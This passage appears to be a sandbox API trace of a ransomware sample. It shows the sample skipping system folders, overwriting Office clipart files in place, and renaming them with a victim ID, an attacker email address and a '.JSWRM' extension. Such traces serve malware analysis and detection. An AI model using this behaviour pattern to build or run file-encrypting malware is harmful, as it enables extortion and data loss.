out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1650) returned 0x205850 [0092.661] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1650, lpOverlapped=0x0) returned 1 [0092.663] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.663] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1650, lpOverlapped=0x0) returned 1 [0092.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.663] CloseHandle (hObject=0x314) returned 1 [0092.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0092.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0092.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0092.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.664] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0092.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.664] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x215a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_03.MID", cAlternateFileName="")) returned 1 [0092.664] lstrcmpiW (lpString1="PARNT_03.MID", lpString2=".") returned 1 [0092.664] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="..") returned 1 [0092.664] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="...") returned 1 [0092.664] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="windows") returned -1 [0092.664] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="recovery") returned -1 [0092.665] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="perflogs") returned -1 [0092.665] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="documents and settings") returned 1 [0092.665] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.665] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="system volume information") returned -1 [0092.665] lstrcmpiW (lpString1="PARNT_03.MID", lpString2="msocache") returned 1 [0092.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_03.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_03.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_03.MID", lpUsedDefaultChar=0x0) returned 12 [0092.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_03.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_03.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_03.MID", lpUsedDefaultChar=0x0) returned 12 [0092.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.665] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8538) returned 1 [0092.665] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2150) returned 0x205850 [0092.666] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2150, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2150, lpOverlapped=0x0) returned 1 [0092.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.668] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2150, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2150, lpOverlapped=0x0) returned 1 [0092.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.668] CloseHandle (hObject=0x314) returned 1 [0092.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0092.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0092.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0092.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0092.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0092.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.668] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0092.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.669] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_04.MID", cAlternateFileName="")) returned 1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2=".") returned 1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="..") returned 1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="...") returned 1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="windows") returned -1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="recovery") returned -1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="perflogs") returned -1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="documents and settings") returned 1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="system volume information") returned -1 [0092.669] lstrcmpiW (lpString1="PARNT_04.MID", lpString2="msocache") returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_04.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_04.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_04.MID", lpUsedDefaultChar=0x0) returned 12 [0092.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_04.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_04.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_04.MID", lpUsedDefaultChar=0x0) returned 12 [0092.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.670] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6070) returned 1 [0092.670] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17b0) returned 0x205850 [0092.670] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x17b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x17b0, lpOverlapped=0x0) returned 1 [0092.672] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.672] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x17b0, lpOverlapped=0x0) returned 1 [0092.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.672] CloseHandle (hObject=0x314) returned 1 [0092.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0092.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0092.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0092.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0092.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0092.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.672] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0092.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.673] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1784, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_05.MID", cAlternateFileName="")) returned 1 [0092.673] lstrcmpiW (lpString1="PARNT_05.MID", lpString2=".") returned 1 [0092.673] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="..") returned 1 [0092.673] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="...") returned 1 [0092.673] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="windows") returned -1 [0092.673] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="recovery") returned -1 [0092.673] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="perflogs") returned -1 [0092.673] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="documents and settings") returned 1 [0092.674] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.674] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="system volume information") returned -1 [0092.674] lstrcmpiW (lpString1="PARNT_05.MID", lpString2="msocache") returned 1 [0092.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_05.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_05.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_05.MID", lpUsedDefaultChar=0x0) returned 12 [0092.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_05.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_05.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_05.MID", lpUsedDefaultChar=0x0) returned 12 [0092.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0092.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.675] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6020) returned 1 [0092.675] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1780) returned 0x205850 [0092.675] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1780, lpOverlapped=0x0) returned 1 [0092.677] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.677] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1780, lpOverlapped=0x0) returned 1 [0092.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.677] CloseHandle (hObject=0x314) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0092.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, 